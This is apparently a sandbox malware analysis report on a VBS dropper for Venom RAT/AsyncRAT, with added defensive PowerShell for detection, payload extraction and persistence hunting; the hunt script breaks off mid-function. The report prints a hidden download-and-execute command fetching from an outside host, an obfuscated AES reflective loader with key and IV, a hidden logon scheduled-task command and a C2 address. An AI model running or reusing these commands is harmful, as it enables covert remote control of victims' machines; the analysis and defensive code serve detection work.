Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    13/12/2024, 02:49 UTC

General

  • Target

    9f0e70dc0dcfc4cfdadd1e2d1c9678ed09a3e4d8eb2c742e454b8fe06256a7e2.vbs

  • Size

    79KB

  • MD5

    c0e2ce250c4979a59970d22fd99f340f

  • SHA1

    4e5ad3c3ed1e8871abfd8d0f8466b3ddbc521be0

  • SHA256

    9f0e70dc0dcfc4cfdadd1e2d1c9678ed09a3e4d8eb2c742e454b8fe06256a7e2

  • SHA512

    f6b43f831302a4760f0d6a8a6e822156b68423f6b0a8e313088007ec28e3e7fc0c9f1ba3659bdff7e7889faf6ec30eb8b826a0a3ebf8c3533b38b0318d483404

  • SSDEEP

    1536:lcX2qy9/TpzprFm7xcGhX4y7t3t+JlpbebTQOsod:lcX2pl+HhXVxqild

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

OMEN core i9

C2

45.88.88.7:4164

Mutex

qqkyuzisfolbtlf

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain
1
YHR4dQfnx55tUzYOYRjoXwdjLgLXeKIa

Signatures

  • AsyncRat

    AsyncRAT is a remote access trojan written in C#, designed to remotely monitor and control other computers.

  • Asyncrat family
  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 19 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Runs PowerShell with its display window hidden.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 28 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
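The signatures above are the behaviours the sandbox matched. The PowerShell below is an added example, not code from the page, from Triage or from the malware author, that turns the command lines in the process tree further down into a scoring rule set for process-creation telemetry. The sample records are constructed from that tree (PID, parent PID, image, command line; the long cmd.exe echo line is excerpted), the rule names, weights and threshold are illustrative choices of mine, and in production the same four fields come from Sysmon Event ID 1 or Security event 4688. It also shows why the child `powershell.exe -w hidden` needs context: its own command line carries no script (the loader text is on the sibling cmd.exe echo command line), so the verdict for a PowerShell process is lifted from its parent and siblings.

```powershell
# Added example (not from the page): score process-creation records for the loader patterns in this report.
# Sample records below are constructed from the process tree (PID|ParentPID|Image|CommandLine); the long
# cmd.exe echo line is excerpted. Rule names, weights and the threshold are illustrative choices.

$Rules = @(
    @{ Name = 'download-cradle';     Weight = 3; Pattern = '\biex\b.*\biwr\b|Invoke-Expression|DownloadString' }
    @{ Name = 'hidden-window';       Weight = 1; Pattern = '-w(indowstyle)?\s+hidden' }
    @{ Name = 'reversed-string-api'; Weight = 4; Pattern = "'[A-Za-z0-9]+'\[-1\.\.-\d+\]\s*-join\s*''" }   # 'gnirtS46esaBmorF'[-1..-16] -join ''
    @{ Name = 'reflective-load';     Weight = 3; Pattern = 'Reflection\.Assembly\]::|\.EntryPoint\.Invoke|TransformFinalBlock' }
    @{ Name = 'echo-to-powershell';  Weight = 3; Pattern = 'cmd\.exe\s+/S\s+/D\s+/c"\s*echo\s+function' }
    @{ Name = 'hidden-logon-task';   Weight = 3; Pattern = 'Register-ScheduledTask(?=.*-AtLogon)(?=.*-Hidden)(?=.*-RunLevel\s+Highest)' }
    @{ Name = 'script-in-profile';   Weight = 1; Pattern = '\\AppData\\(Roaming|Local\\Temp)\\[^"\s]+\.(vbs|bat)' }
)
$Threshold = 4

function Get-CommandLineScore {
    # Sum of the weights of every rule whose pattern matches, plus the matching rule names
    param([string]$CommandLine)
    $score = 0; $names = @()
    foreach ($rule in $Rules) {
        if ($CommandLine -match $rule.Pattern) { $score += $rule.Weight; $names += $rule.Name }
    }
    [pscustomobject]@{ Score = $score; Rules = $names }
}

# Constructed from the process tree of this report; field order is PID|ParentPID|Image|CommandLine
$SampleEvents = @'
4916|0|WScript.exe|"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9f0e70dc0dcfc4cfdadd1e2d1c9678ed09a3e4d8eb2c742e454b8fe06256a7e2.vbs"
1188|4916|powershell.exe|"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
376|4916|cmd.exe|C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
3524|376|cmd.exe|C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1Elx3Sctpo07VJY1RgoaRojmCs/l4e8YyOviovJt3MU='); ... $zInbo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); ... $Orgvi = 'C:\Users\Admin\AppData\Local\Temp\system.bat'; ... "
4472|376|powershell.exe|"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
3536|4472|powershell.exe|"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_306_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_306.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
'@

$Events = foreach ($line in ($SampleEvents -split "`r?`n")) {
    if (-not $line.Trim()) { continue }
    $f = $line -split '\|', 4
    [pscustomobject]@{ Pid = [int]$f[0]; ParentPid = [int]$f[1]; Image = $f[2]; CommandLine = $f[3] }
}

function Invoke-LoaderDetection {
    param([object[]]$Records)
    foreach ($r in $Records) {
        $own = Get-CommandLineScore $r.CommandLine
        # 'powershell.exe -w hidden' carries no script on its own command line (the batch file feeds it
        # through cmd.exe echo), so also score the parent and siblings and let the best of them lift the verdict
        $related = @($Records | Where-Object { $_.Pid -eq $r.ParentPid -or ($_.ParentPid -eq $r.ParentPid -and $_.Pid -ne $r.Pid) })
        $context = 0
        foreach ($x in $related) { $s = (Get-CommandLineScore $x.CommandLine).Score; if ($s -gt $context) { $context = $s } }
        $verdict = 'ok'
        if ($own.Score -ge $Threshold) { $verdict = 'ALERT' }
        elseif ($r.Image -match 'powershell' -and $context -ge $Threshold) { $verdict = 'ALERT (via related process)' }
        [pscustomobject]@{ Pid = $r.Pid; Image = $r.Image; Score = $own.Score; Context = $context; Rules = ($own.Rules -join ','); Verdict = $verdict }
    }
}

Invoke-LoaderDetection $Events | Format-Table -AutoSize
```

In the constructed set the iex/iwr stage, the cmd.exe echo line and the Register-ScheduledTask call clear the threshold on their own command lines, while the bare `-w hidden` PowerShell only matches the hidden-window rule and is flagged through its sibling cmd.exe. A rule set that scores command lines in isolation misses that process, which is the one that ends up talking to the C2 in the tree above.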

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9f0e70dc0dcfc4cfdadd1e2d1c9678ed09a3e4d8eb2c742e454b8fe06256a7e2.vbs"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:4916
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1188
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:376
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1Elx3Sctpo07VJY1RgoaRojmCs/l4e8YyOviovJt3MU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0frhhpE1hB3Q0RCUXEd+g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vNThT=New-Object System.IO.MemoryStream(,$param_var); $tYiMG=New-Object System.IO.MemoryStream; $LFBux=New-Object System.IO.Compression.GZipStream($vNThT, [IO.Compression.CompressionMode]::Decompress); $LFBux.CopyTo($tYiMG); $LFBux.Dispose(); $vNThT.Dispose(); $tYiMG.Dispose(); $tYiMG.ToArray();}function execute_function($param_var,$param2_var){ $zInbo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xuOPn=$zInbo.EntryPoint; $xuOPn.Invoke($null, $param2_var);}$Orgvi = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $Orgvi;$gYhAt=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Orgvi).Split([Environment]::NewLine);foreach ($jYIFP in $gYhAt) { if ($jYIFP.StartsWith('hvdMXDExQOuXjNppwfgb')) { $JMsAA=$jYIFP.Substring(20); break; }}$payloads_var=[string[]]$JMsAA.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        3⤵
          PID:3524
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4472
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_306_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_306.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3536
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_306.vbs"
            4⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:1444
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_306.bat" "
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1164
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1Elx3Sctpo07VJY1RgoaRojmCs/l4e8YyOviovJt3MU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y0frhhpE1hB3Q0RCUXEd+g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vNThT=New-Object System.IO.MemoryStream(,$param_var); $tYiMG=New-Object System.IO.MemoryStream; $LFBux=New-Object System.IO.Compression.GZipStream($vNThT, [IO.Compression.CompressionMode]::Decompress); $LFBux.CopyTo($tYiMG); $LFBux.Dispose(); $vNThT.Dispose(); $tYiMG.Dispose(); $tYiMG.ToArray();}function execute_function($param_var,$param2_var){ $zInbo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xuOPn=$zInbo.EntryPoint; $xuOPn.Invoke($null, $param2_var);}$Orgvi = 'C:\Users\Admin\AppData\Roaming\Windows_Log_306.bat';$host.UI.RawUI.WindowTitle = $Orgvi;$gYhAt=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Orgvi).Split([Environment]::NewLine);foreach ($jYIFP in $gYhAt) { if ($jYIFP.StartsWith('hvdMXDExQOuXjNppwfgb')) { $JMsAA=$jYIFP.Substring(20); break; }}$payloads_var=[string[]]$JMsAA.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                6⤵
                  PID:3272
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                  6⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of SetWindowsHookEx
                  PID:4976
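The two `cmd.exe /S /D /c" echo function decrypt_function ...` lines above are the batch-file loader for system.bat and Windows_Log_306.bat. It reads the .bat file it lives in, takes the first line that starts with the 20-character marker hvdMXDExQOuXjNppwfgb, splits the rest on '\', undoes a custom base64 substitution ('#' stands for '/', '@' for 'A'), AES-256-CBC decrypts with a hard-coded key and IV, GZip-decompresses and reflectively loads the resulting .NET assemblies; the reversed-string tricks such as `'gnirtS46esaBmorF'[-1..-16] -join ''` are just FromBase64String, Load and ReadAllText spelled backwards to dodge keyword matching. The PowerShell below is an added example, not code from the page or the malware author, that reimplements that chain as a static extractor using the key, IV and marker from the command line above, so the embedded assemblies can be recovered from a dropped .bat without executing them. The .bat text it decodes is constructed in the script (two short byte strings encoded with the same scheme), since the real payload bytes are not on this page.

```powershell
# Added example, not code from the page or the malware: static extractor for the .bat loader above.
# Key, IV, marker and the '#'->'/' and '@'->'A' substitution are taken from the captured command line;
# the .bat text decoded at the end is constructed here so the script runs offline.

$Key    = [Convert]::FromBase64String('1Elx3Sctpo07VJY1RgoaRojmCs/l4e8YyOviovJt3MU=')  # 32 bytes: AES-256
$IV     = [Convert]::FromBase64String('Y0frhhpE1hB3Q0RCUXEd+g==')                      # 16 bytes
$Marker = 'hvdMXDExQOuXjNppwfgb'   # the loader takes .Substring(20) of the first line that starts with this

function Invoke-AesCbc {
    # Same AES-CBC/PKCS7 setup as the loader's decrypt_function; $Decrypt $false is used to build the sample
    param([byte[]]$Data, [bool]$Decrypt)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key = $Key
    $aes.IV  = $IV
    $xf = if ($Decrypt) { $aes.CreateDecryptor() } else { $aes.CreateEncryptor() }
    try     { $out = $xf.TransformFinalBlock($Data, 0, $Data.Length); ,$out }
    finally { $xf.Dispose(); $aes.Dispose() }
}

function Expand-Gzip {
    # Mirrors decompress_function
    param([byte[]]$Data)
    $src = New-Object System.IO.MemoryStream(,$Data)
    $dst = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($src, [System.IO.Compression.CompressionMode]::Decompress)
    $gz.CopyTo($dst); $gz.Dispose(); $src.Dispose()
    ,$dst.ToArray()
}

function Compress-Gzip {
    # Only needed to build the constructed sample
    param([byte[]]$Data)
    $dst = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($dst, [System.IO.Compression.CompressionMode]::Compress)
    $gz.Write($Data, 0, $Data.Length); $gz.Dispose()   # Dispose flushes the gzip trailer
    ,$dst.ToArray()
}

function ConvertFrom-LoaderChunk {
    # One '\'-separated chunk of the marker line -> plaintext bytes, in the loader's order:
    # undo the substitution, base64-decode, AES-decrypt, gunzip
    param([string]$Chunk)
    $b64 = $Chunk.Replace('#', '/').Replace('@', 'A')
    Expand-Gzip (Invoke-AesCbc -Data ([Convert]::FromBase64String($b64)) -Decrypt $true)
}

function ConvertTo-LoaderChunk {
    # Inverse of ConvertFrom-LoaderChunk; '#' and '@' are outside the base64 alphabet, so the substitution is reversible
    param([byte[]]$Payload)
    $enc = Invoke-AesCbc -Data (Compress-Gzip $Payload) -Decrypt $false
    [Convert]::ToBase64String($enc).Replace('/', '#').Replace('A', '@')
}

function Get-LoaderPayloads {
    # Returns one byte[] per embedded payload; the real loader hands each to Assembly.Load and invokes its EntryPoint
    param([string]$BatText)
    $line = ($BatText -split "`r?`n") | Where-Object { $_.StartsWith($Marker) } | Select-Object -First 1
    if (-not $line) { throw "no line starting with marker '$Marker' found" }
    foreach ($chunk in $line.Substring($Marker.Length).Split('\')) { ,(ConvertFrom-LoaderChunk $chunk) }
}

# Constructed stand-in for system.bat: two short byte strings where the real file carries two .NET assemblies
$samplePayloads = @(
    [System.Text.Encoding]::UTF8.GetBytes('constructed payload 1 (stands in for the first assembly)'),
    [System.Text.Encoding]::UTF8.GetBytes('constructed payload 2 (stands in for the second assembly)')
)
$chunks    = $samplePayloads | ForEach-Object { ConvertTo-LoaderChunk $_ }
$sampleBat = "@echo off`r`nrem constructed sample, not the real dropper`r`n$Marker$($chunks -join '\')`r`n"

$n = 0
foreach ($payload in @(Get-LoaderPayloads $sampleBat)) {
    $n++
    # A real payload is a PE image (Assembly.Load needs one), so it starts with 'MZ'; check before writing it out
    $isPe = $payload.Length -ge 2 -and $payload[0] -eq 0x4D -and $payload[1] -eq 0x5A
    "payload $($n): $($payload.Length) bytes, PE header: $isPe, content: $([System.Text.Encoding]::UTF8.GetString($payload))"
}
```

Against a real dropped file, replace `$sampleBat` with `Get-Content -Raw 'C:\Users\Admin\AppData\Local\Temp\system.bat'` and write each recovered blob out with `[IO.File]::WriteAllBytes` for a .NET decompiler; both blobs should pass the MZ check, because the loader calls Assembly.Load on them. The loader executes the first assembly with no arguments and the second with a single empty string, which is the usual split between a helper (typically AMSI or ETW tampering) and the RAT itself, but that division is not something this page confirms.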

      Network

      DNS queries (all to resolver 8.8.8.8:53; a process is named only where the sandbox attributed the query):

        104.219.191.52.in-addr.arpa   PTR   no answer recorded
        emptyservices.xyz             A     powershell.exe   no answer recorded
        77.190.18.2.in-addr.arpa      PTR   a2-18-190-77.deploy.static.akamaitechnologies.com
        95.221.229.192.in-addr.arpa   PTR   no answer recorded
        149.220.183.52.in-addr.arpa   PTR   no answer recorded
        228.249.119.40.in-addr.arpa   PTR   no answer recorded
        212.20.149.52.in-addr.arpa    PTR   no answer recorded
        206.23.85.13.in-addr.arpa     PTR   no answer recorded
        21.236.111.52.in-addr.arpa    PTR   no answer recorded

      Only the emptyservices.xyz lookup, for the second-stage host in the iwr command above, is attributed to a sample process. The PTR queries carry no process attribution and are reverse lookups of Microsoft and CDN address space, the usual Windows background activity in a sandbox, so they are not indicators for this sample.
      Connections (bytes and packets sent by the guest, then received by it):

        Destination       Process         Sent    Received  Pkts sent  Pkts recv  DNS query
        45.88.88.7:4164   powershell.exe  260 B   200 B     5          5
        45.88.88.7:4164   powershell.exe  260 B   200 B     5          5
        45.88.88.7:4164   powershell.exe  260 B   200 B     5          5
        45.88.88.7:4164   powershell.exe  260 B   200 B     5          5
        45.88.88.7:4164   powershell.exe  260 B   200 B     5          5
        45.88.88.7:4164   powershell.exe  260 B   160 B     5          4
        45.88.88.7:4164   powershell.exe  260 B   200 B     5          5
        45.88.88.7:4164   powershell.exe  260 B   200 B     5          5
        45.88.88.7:4164   powershell.exe  260 B   200 B     5          5
        45.88.88.7:4164   powershell.exe  260 B   200 B     5          5
        45.88.88.7:4164   powershell.exe  260 B   200 B     5          5
        45.88.88.7:4164   powershell.exe  260 B   200 B     5          5
        45.88.88.7:4164   powershell.exe  260 B   200 B     5          5
        45.88.88.7:4164   powershell.exe  260 B   200 B     5          5
        45.88.88.7:4164   powershell.exe  260 B   200 B     5          5
        45.88.88.7:4164   powershell.exe  260 B   200 B     5          5
        45.88.88.7:4164   powershell.exe  260 B   200 B     5          5
        45.88.88.7:4164   powershell.exe  260 B   200 B     5          5
        45.88.88.7:4164   powershell.exe  208 B   160 B     4          4
        8.8.8.8:53        dns             73 B    147 B     1          1          104.219.191.52.in-addr.arpa
        8.8.8.8:53        powershell.exe  63 B    128 B     1          1          emptyservices.xyz (dns)
        8.8.8.8:53        dns             70 B    133 B     1          1          77.190.18.2.in-addr.arpa
        8.8.8.8:53        dns             73 B    144 B     1          1          95.221.229.192.in-addr.arpa
        8.8.8.8:53        dns             73 B    147 B     1          1          149.220.183.52.in-addr.arpa
        8.8.8.8:53        dns             73 B    159 B     1          1          228.249.119.40.in-addr.arpa
        8.8.8.8:53        dns             72 B    146 B     1          1          212.20.149.52.in-addr.arpa
        8.8.8.8:53        dns             71 B    145 B     1          1          206.23.85.13.in-addr.arpa
        8.8.8.8:53        dns             72 B    158 B     1          1          21.236.111.52.in-addr.arpa

      All 19 connections to the configured C2 45.88.88.7:4164 work out to 52 B per packet sent and 40 B per packet received (260 B/5, 208 B/4, 200 B/5, 160 B/4), which is consistent with IP and TCP headers only and no application payload. The sessions were set up and torn down without a protocol exchange during the run, so the C2 address and port are corroborated by the extracted configuration above rather than by observed RAT traffic. The byte counts are whole packets: the 73 B sent for the first PTR query is exactly a 20-byte IP header, 8-byte UDP header and a 45-byte DNS query for that name.

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        2f57fde6b33e89a63cf0dfdd6e60a351

        SHA1

        445bf1b07223a04f8a159581a3d37d630273010f

        SHA256

        3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

        SHA512

        42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

        Filesize

        2KB

        MD5

        005bc2ef5a9d890fb2297be6a36f01c2

        SHA1

        0c52adee1316c54b0bfdc510c0963196e7ebb430

        SHA256

        342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

        SHA512

        f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        b66db53846de4860ca72a3e59b38c544

        SHA1

        2202dc88e9cddea92df4f4e8d83930efd98c9c5a

        SHA256

        b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030

        SHA512

        72eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1n11pi01.qk0.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\system.bat

        Filesize

        69KB

        MD5

        8078d12b395b01ad397cec896ae02a6a

        SHA1

        2a5b18660c4b2b40969651ca16a1ede64f3aecf5

        SHA256

        0c691215924b9a058ad733c185b1eb24f5b7be83206ad634a3027bd4641689a7

        SHA512

        df31dc5758e39eaf761d7874ed47ca42274a57b333e7469423c65ecf676e41494e08bb7cf051e21faf39a69fa0198576696e05f981952ce21d714e32cd3bee2a

      • C:\Users\Admin\AppData\Roaming\Windows_Log_306.vbs

        Filesize

        115B

        MD5

        196f1476d832a6085e80730d7318bc04

        SHA1

        fff8676fdf96eb8655051b14c9e650880dc81945

        SHA256

        17a717c7781f2bc4c1738160eac02c1777517ec62838889e440cade2fa89d55c

        SHA512

        e6f79e4c96748089a73e7a8ae9e95e911cdc7f97fef9a12c88178f185fb8dc4c67dc800bd7eaa025c5bb48909f218ffee87dc8aedc29914af916bf1956e3b2a4

      • memory/1188-12-0x00007FFE161D0000-0x00007FFE16C91000-memory.dmp

        Filesize

        10.8MB

      • memory/1188-17-0x00007FFE161D0000-0x00007FFE16C91000-memory.dmp

        Filesize

        10.8MB

      • memory/1188-14-0x00007FFE161D0000-0x00007FFE16C91000-memory.dmp

        Filesize

        10.8MB

      • memory/1188-13-0x00007FFE161D0000-0x00007FFE16C91000-memory.dmp

        Filesize

        10.8MB

      • memory/1188-0-0x00007FFE161D3000-0x00007FFE161D5000-memory.dmp

        Filesize

        8KB

      • memory/1188-11-0x00007FFE161D0000-0x00007FFE16C91000-memory.dmp

        Filesize

        10.8MB

      • memory/1188-1-0x000002C9E4350000-0x000002C9E4372000-memory.dmp

        Filesize

        136KB

      • memory/4472-32-0x00000270EE9E0000-0x00000270EEA24000-memory.dmp

        Filesize

        272KB

      • memory/4472-33-0x00000270EECD0000-0x00000270EED46000-memory.dmp

        Filesize

        472KB

      • memory/4472-34-0x00000270EE990000-0x00000270EE998000-memory.dmp

        Filesize

        32KB

      • memory/4472-35-0x00000270EE9A0000-0x00000270EE9B2000-memory.dmp

        Filesize

        72KB

      • memory/4976-64-0x000001E3E72E0000-0x000001E3E72F8000-memory.dmp

        Filesize

        96KB
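The dropped files listed above (system.bat in the user's Temp folder, Windows_Log_306.vbs in Roaming AppData) and the hidden at-logon task Windows_Log_306_str from the process tree are what an incident responder would sweep other hosts for. The PowerShell below is an added example, not from the page, Triage or the malware author, of that hunt, generalised to any scheduled task or Run value that launches a script file from a user profile. The task name and file names are the ones from this report; the regular expressions and the choice of interpreters are mine. HKCU and the %APPDATA%/%TEMP% paths are per user, so run it in the context of the user being inspected (and elevated, to read every task).

```powershell
# Added example, not from the page: hunt for this report's persistence on a live Windows host.
# Generalised to any scheduled task or Run value that runs a script file from a user profile; the
# task name and file names are the ones seen in this report.

$KnownTask    = 'Windows_Log_306_str'
$DroppedFiles = @("$env:APPDATA\Windows_Log_306.vbs", "$env:APPDATA\Windows_Log_306.bat", "$env:TEMP\system.bat")
$ProfilePath  = '\\Users\\[^\\]+\\'                                   # any user profile, not just the current one
$ScriptExt    = '\.(vbs|vbe|js|jse|wsf|bat|cmd|ps1)("|\s|$)'          # script extension ending a path token
$Interpreter  = '(^"?|\\)(wscript|cscript|cmd|powershell|pwsh|mshta)(\.exe)?"?\s*$'

function Test-ScriptFromProfile {
    # True when the command runs a script file under a user profile, or an interpreter whose argument
    # is a script outside the Windows and Program Files trees
    param([string]$Execute, [string]$Arguments)
    $cmd = "$Execute $Arguments"
    if ($cmd -match "$($ProfilePath).*$($ScriptExt)") { return $true }
    if ($Execute -match $Interpreter -and $Arguments -match $ScriptExt -and
        $Arguments -notmatch '\\Windows\\|\\Program Files') { return $true }
    return $false
}

function Find-SuspiciousTasks {
    foreach ($task in Get-ScheduledTask) {
        $atLogon = @($task.Triggers | Where-Object { $_.CimClass.CimClassName -eq 'MSFT_TaskLogonTrigger' }).Count -gt 0
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }          # COM-handler actions have no Execute
            if (Test-ScriptFromProfile -Execute $action.Execute -Arguments $action.Arguments) {
                [pscustomobject]@{
                    Task      = $task.TaskPath + $task.TaskName
                    KnownName = ($task.TaskName -eq $KnownTask)
                    Execute   = $action.Execute
                    Arguments = $action.Arguments
                    AtLogon   = $atLogon
                    Hidden    = $task.Settings.Hidden
                    RunLevel  = $task.Principal.RunLevel
                    TimeLimit = $task.Settings.ExecutionTimeLimit   # PT0S = no limit, which is what -ExecutionTimeLimit 0 sets
                }
            }
        }
    }
}

function Find-SuspiciousRunValues {
    foreach ($hive in 'HKCU', 'HKLM') {
        $path = "$($hive):\Software\Microsoft\Windows\CurrentVersion\Run"
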